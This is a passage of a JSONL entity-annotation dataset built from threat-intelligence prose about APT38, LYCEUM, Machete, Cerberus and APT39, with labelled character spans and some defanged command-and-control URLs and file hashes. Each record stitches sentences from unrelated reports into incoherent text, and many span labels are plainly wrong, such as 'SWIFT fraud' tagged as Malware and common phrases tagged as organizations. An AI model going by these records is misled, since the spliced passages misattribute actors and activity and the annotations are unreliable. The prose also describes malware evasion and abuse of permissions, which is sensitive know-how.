Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": [{"start": 185, "end": 198, "label": "System"}, {"start": 204, "end": 221, "label": "System"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 540, "end": 551, "label": "Organization"}, {"start": 602, "end": 607, "label": "Organization"}]} {"text": "The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": [{"start": 139, "end": 145, "label": "Organization"}, {"start": 169, "end": 175, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 329, "end": 351, "label": "Organization"}, {"start": 387, "end": 392, "label": "Malware"}]} {"text": "We have observed this trojan being submitted to public antivirus testing platforms , once as a package and once for each DLL to determine the detection ratio . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . 
We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": [{"start": 160, "end": 166, "label": "Organization"}, {"start": 187, "end": 194, "label": "System"}]} {"text": "The sample analyzed was targeted at Russian-speaking users , as most of the user interaction pages are written in Russian . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": [{"start": 159, "end": 167, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 209, "end": 221, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}]} {"text": "However , given the way the trojan is built , it is highly customizable , meaning that adapting it to a different language would be extremely easy . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . 
As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": [{"start": 189, "end": 195, "label": "System"}, {"start": 220, "end": 223, "label": "Organization"}, {"start": 227, "end": 235, "label": "Organization"}, {"start": 238, "end": 244, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 405, "end": 427, "label": "Organization"}]} {"text": "The wide range of capabilities does n't limit this trojan to a specific malicious activity like a banking trojan or a ransomware . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": [{"start": 141, "end": 144, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 349, "end": 373, "label": "Organization"}, {"start": 384, "end": 407, "label": "Organization"}, {"start": 465, "end": 484, "label": "Organization"}, {"start": 505, "end": 521, "label": "Organization"}]} {"text": "This makes it impossible to create a target profile . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . 
Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": [{"start": 54, "end": 60, "label": "Organization"}, {"start": 86, "end": 106, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 378, "end": 400, "label": "Organization"}, {"start": 411, "end": 422, "label": "Organization"}]} {"text": "Conclusion This trojan shows a new path for threats to evolve . Aside from deploying novel malware , LYCEUM\u2019s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": [{"start": 101, "end": 109, "label": "Organization"}, {"start": 145, "end": 148, "label": "Organization"}, {"start": 249, "end": 260, "label": "Organization"}]} {"text": "Having the ability to move code from desktops to mobile platforms with no effort , like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . 
While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 .", "spans": [{"start": 92, "end": 103, "label": "Indicator"}, {"start": 369, "end": 375, "label": "Organization"}, {"start": 612, "end": 621, "label": "Organization"}, {"start": 693, "end": 698, "label": "Organization"}]} {"text": "This trojan 's design and implementation is of an uncommonly high level , making it a dangerous threat . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 206, "end": 219, "label": "Organization"}, {"start": 222, "end": 227, "label": "Organization"}]} {"text": "These kinds of threats will become more common , as more and more companies decide to publish their software directly to consumers . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . 
APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 233, "end": 240, "label": "System"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}]} {"text": "There have been several recent examples of companies choosing to release their software directly to consumers , bypassing traditional storefronts . ESET has been tracking a new version of Machete (the group\u2019s Python-based toolset) that was first seen in April 2018 . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": [{"start": 148, "end": 152, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 346, "end": 363, "label": "Organization"}]} {"text": "The average user might not have the necessary skills to distinguish legitimate sites from malicious ones . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . 
Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": [{"start": 167, "end": 186, "label": "Organization"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 319, "end": 341, "label": "Organization"}]} {"text": "We 've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms , so , unfortunately , it does n't seem that this will change any time soon . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": [{"start": 195, "end": 200, "label": "Organization"}, {"start": 395, "end": 417, "label": "Organization"}, {"start": 468, "end": 473, "label": "Organization"}, {"start": 535, "end": 540, "label": "Organization"}]} {"text": "And this just means attackers will continue to be successful . Machete is interested in files that describe navigation routes and positioning using military grids . 
In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": [{"start": 63, "end": 70, "label": "Organization"}, {"start": 99, "end": 125, "label": "Organization"}, {"start": 185, "end": 190, "label": "Organization"}, {"start": 200, "end": 207, "label": "Malware"}, {"start": 227, "end": 234, "label": "Malware"}, {"start": 239, "end": 248, "label": "Malware"}, {"start": 338, "end": 342, "label": "Organization"}]} {"text": "Coverage Additional ways our customers can detect and block this threat are listed below . The Machete group sends very specific emails directly to its victims , and these change from target to target . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": [{"start": 95, "end": 102, "label": "Organization"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 238, "end": 245, "label": "Malware"}, {"start": 265, "end": 272, "label": "Malware"}, {"start": 277, "end": 286, "label": "Malware"}, {"start": 376, "end": 380, "label": "Organization"}]} {"text": "Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . 
From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": [{"start": 0, "end": 35, "label": "System"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 366, "end": 371, "label": "Organization"}]} {"text": "Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 0, "end": 32, "label": "System"}, {"start": 36, "end": 66, "label": "System"}, {"start": 162, "end": 179, "label": "Malware"}, {"start": 198, "end": 207, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 276, "end": 297, "label": "Indicator"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 377, "end": 382, "label": "Organization"}]} {"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}]} {"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . 
The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": [{"start": 36, "end": 69, "label": "System"}, {"start": 72, "end": 125, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 206, "end": 222, "label": "Malware"}, {"start": 252, "end": 265, "label": "Malware"}, {"start": 341, "end": 352, "label": "Organization"}, {"start": 363, "end": 372, "label": "Malware"}, {"start": 399, "end": 404, "label": "Organization"}, {"start": 429, "end": 433, "label": "Organization"}]} {"text": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 106, "end": 110, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}, {"start": 228, "end": 235, "label": "Malware"}, {"start": 394, "end": 398, "label": "Organization"}]} {"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 206, "end": 219, "label": "Malware"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 324, "end": 329, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 440, "end": 454, "label": "Organization"}]} {"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": [{"start": 276, "end": 283, "label": "Organization"}, {"start": 360, "end": 362, "label": "Organization"}, {"start": 403, "end": 408, "label": "Organization"}, {"start": 525, "end": 532, "label": "Organization"}]} {"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . 
During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": [{"start": 38, "end": 62, "label": "Indicator"}, {"start": 63, "end": 100, "label": "Indicator"}, {"start": 101, "end": 137, "label": "Indicator"}, {"start": 150, "end": 161, "label": "Indicator"}, {"start": 164, "end": 228, "label": "Indicator"}, {"start": 229, "end": 239, "label": "Indicator"}, {"start": 242, "end": 306, "label": "Indicator"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 467, "end": 472, "label": "Organization"}, {"start": 497, "end": 501, "label": "Organization"}]} {"text": "Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed \u201c Cerberus \u201d , being rented out on underground forums . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 13, "end": 77, "label": "Indicator"}, {"start": 101, "end": 114, "label": "Indicator"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 194, "end": 206, "label": "Organization"}, {"start": 228, "end": 235, "label": "System"}, {"start": 255, "end": 263, "label": "Malware"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 513, "end": 522, "label": "Organization"}]} {"text": "Its authors claim that it was used for private operations for two years preceding the start of the rental . 
ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 108, "end": 112, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}]} {"text": "They also state that the code is written from scratch and is not using parts of other existing banking Trojans unlike many other Trojans that are either based completely on the source of another Trojan ( such as the leaked Anubis source code that is now being resold ) or at least borrow parts of other Trojans . The group behind Machete uses effective spearphishing techniques . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 223, "end": 229, "label": "Malware"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}, {"start": 447, "end": 469, "label": "Organization"}]} {"text": "After thorough analysis we can confirm that Cerberus was indeed not based on the Anubis source code . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . 
APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 44, "end": 52, "label": "Malware"}, {"start": 81, "end": 87, "label": "Malware"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 372, "end": 394, "label": "Organization"}]} {"text": "One peculiar thing about the actor group behind this banking malware is that they have an \u201c official \u201d twitter account that they use to post promotional content ( even videos ) about the malware . In 2018 Machete reappeared with new code and new features . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 103, "end": 110, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 257, "end": 262, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}, {"start": 324, "end": 346, "label": "Organization"}]} {"text": "Oddly enough they also use it to make fun of the AV community , sharing detection screenshots from VirusTotal ( thus leaking IoC ) and even engaging in discussions with malware researchers directly The following screenshot shows tweets from their advertisement campaign : That unusual behavior could be explained by the combination of the need for attention and a probable lack of experience . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . 
Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": [{"start": 99, "end": 109, "label": "Organization"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 553, "end": 561, "label": "Organization"}, {"start": 596, "end": 601, "label": "Organization"}, {"start": 606, "end": 617, "label": "Organization"}, {"start": 684, "end": 702, "label": "Organization"}]} {"text": "What is sure is that the gap in the Android banking malware rental business left open after the rental of the Anubis 2 and RedAlert 2 Trojans ended provides a good opportunity for the actors behind Cerberus to grow their business quickly . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 362, "end": 367, "label": "Organization"}, {"start": 388, "end": 413, "label": "Organization"}, {"start": 449, "end": 464, "label": "Organization"}, {"start": 469, "end": 477, "label": "Organization"}, {"start": 502, "end": 520, "label": "Organization"}]} {"text": "The Android banking Trojan rental business Rental of banking Trojans is not new . Machete was active and constantly working on very effective spearphishing campaigns . 
This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 82, "end": 89, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}]} {"text": "It was an existing business model when computer-based banking malware was the only form of banking malware and has shifted to the Android equivalent a few years later . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": [{"start": 130, "end": 137, "label": "System"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 347, "end": 353, "label": "Organization"}]} {"text": "The life span of Android banking malware is limited to either the will of its author ( s ) to support it or the arrest of those actors . Machete relies on spearphishing to compromise its targets . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": [{"start": 17, "end": 24, "label": "System"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 322, "end": 337, "label": "Organization"}, {"start": 348, "end": 359, "label": "Organization"}, {"start": 380, "end": 387, "label": "Organization"}]} {"text": "This malware-life-cycle has been observed to reoccur every few years , bringing new malware families into light . 
They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 114, "end": 118, "label": "Organization"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 324, "end": 332, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}, {"start": 374, "end": 379, "label": "Organization"}, {"start": 437, "end": 441, "label": "Organization"}]} {"text": "Each time a rented malware reaches the end of its life it provides the opportunity for other actors a to take over the malware rental market-share . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": [{"start": 149, "end": 158, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}, {"start": 414, "end": 429, "label": "Organization"}, {"start": 440, "end": 451, "label": "Organization"}, {"start": 472, "end": 479, "label": "Organization"}, {"start": 575, "end": 604, "label": "Organization"}, {"start": 607, "end": 610, "label": "Organization"}]} {"text": "As visible on following chart , the lifespan of many well-known rented Android bankers is usually no more than one or two years . 
Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . APT38 .", "spans": [{"start": 71, "end": 78, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 339, "end": 344, "label": "Organization"}]} {"text": "When the family ceases to exist a new one is already available to fill the void , proving that the demand for such malware is always present and that therefore Cerberus has a good chance to survive . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 160, "end": 168, "label": "Malware"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 410, "end": 418, "label": "Malware"}, {"start": 425, "end": 433, "label": "Malware"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 523, "end": 527, "label": "Organization"}]} {"text": "After the actor behind RedAlert 2 decided to quit the rental business , we observed a surge in Anubis samples in the wild . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . 
APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy .", "spans": [{"start": 23, "end": 33, "label": "Malware"}, {"start": 95, "end": 101, "label": "Malware"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 250, "end": 257, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 282, "end": 304, "label": "Organization"}]} {"text": "After the Anubis actor was allegedly arrested and the source code was leaked there was also huge increase in the number of Anubis samples found in the wild , but the new actors using Anubis have no support or updates . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": [{"start": 10, "end": 16, "label": "Malware"}, {"start": 123, "end": 129, "label": "Malware"}, {"start": 183, "end": 189, "label": "Malware"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 347, "end": 352, "label": "Organization"}]} {"text": "Due to this Cerberus will come in handy for actors that want to focus on performing fraud without having to develop and maintain a botnet and C2 infrastructure . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . 
APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 301, "end": 314, "label": "Organization"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}, {"start": 461, "end": 468, "label": "Organization"}]} {"text": "Analysis of evasion techniques Along with the standard payload and string obfuscation , Cerberus uses a rather interesting technique to prevent analysis of the Trojan . By introducing small changes to their code and infrastructure , the group has bypassed several security products . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 88, "end": 96, "label": "Malware"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 284, "end": 289, "label": "Organization"}, {"start": 306, "end": 346, "label": "Organization"}, {"start": 433, "end": 453, "label": "Organization"}]} {"text": "Using the device accelerometer sensor it implements a simple pedometer that is used to measure movements of the victim . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . 
Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 121, "end": 131, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 487, "end": 508, "label": "Organization"}, {"start": 511, "end": 522, "label": "Organization"}, {"start": 525, "end": 536, "label": "Organization"}, {"start": 543, "end": 553, "label": "Organization"}]} {"text": "The idea is simple - if the infected device belongs to a real person , sooner or later this person will move around , increasing the step counter . They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": [{"start": 148, "end": 152, "label": "Malware"}, {"start": 158, "end": 166, "label": "Malware"}, {"start": 172, "end": 180, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 217, "end": 223, "label": "Malware"}, {"start": 296, "end": 302, "label": "Malware"}, {"start": 324, "end": 330, "label": "Malware"}, {"start": 343, "end": 350, "label": "Organization"}]} {"text": "The Trojan uses this counter to activate the bot - if aforementioned step counter hits the pre-configured threshold it considers running on the device to be safe . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . 
Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": [{"start": 224, "end": 235, "label": "Organization"}, {"start": 481, "end": 487, "label": "Malware"}, {"start": 509, "end": 515, "label": "Malware"}, {"start": 528, "end": 537, "label": "Organization"}]} {"text": "This simple measure prevents the Trojan from running and being analyzed in dynamic analysis environments ( sandboxes ) and on the test devices of malware analysts . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group\u2019s hacking . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": [{"start": 170, "end": 176, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}, {"start": 428, "end": 435, "label": "Organization"}, {"start": 443, "end": 460, "label": "Malware"}, {"start": 499, "end": 505, "label": "Organization"}, {"start": 513, "end": 528, "label": "Malware"}, {"start": 533, "end": 550, "label": "Malware"}]} {"text": "The code responsible for this verification is shown in the following snippet : How it works When the malware is first started on the device it will begin by hiding its icon from the application drawer . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . 
APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc .", "spans": [{"start": 217, "end": 226, "label": "Organization"}, {"start": 282, "end": 300, "label": "Organization"}, {"start": 448, "end": 453, "label": "Organization"}, {"start": 512, "end": 535, "label": "Malware"}, {"start": 538, "end": 541, "label": "Malware"}, {"start": 546, "end": 558, "label": "Malware"}, {"start": 561, "end": 564, "label": "Malware"}, {"start": 569, "end": 575, "label": "Malware"}, {"start": 578, "end": 584, "label": "Malware"}, {"start": 591, "end": 598, "label": "Malware"}]} {"text": "Then it will ask for the accessibility service privilege as visible in the following screenshot : After the user grants the requested privilege , Cerberus starts to abuse it by granting itself additional permissions , such as permissions needed to send messages and make calls , without requiring any user interaction . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": [{"start": 146, "end": 154, "label": "Malware"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 528, "end": 533, "label": "Organization"}]} {"text": "It also disables Play Protect ( Google \u2019 s preinstalled antivirus solution ) to prevent its discovery and deletion in the future . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . 
A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 32, "end": 38, "label": "Organization"}, {"start": 167, "end": 178, "label": "Organization"}, {"start": 354, "end": 362, "label": "Vulnerability"}, {"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 496, "end": 507, "label": "Organization"}]} {"text": "After conveniently granting itself additional privileges and securing its persistence on the device , Cerberus registers the infected device in the botnet and waits for commands from the C2 server while also being ready to perform overlay attacks . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker\u2019s server . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 102, "end": 110, "label": "Malware"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 425, "end": 441, "label": "Organization"}, 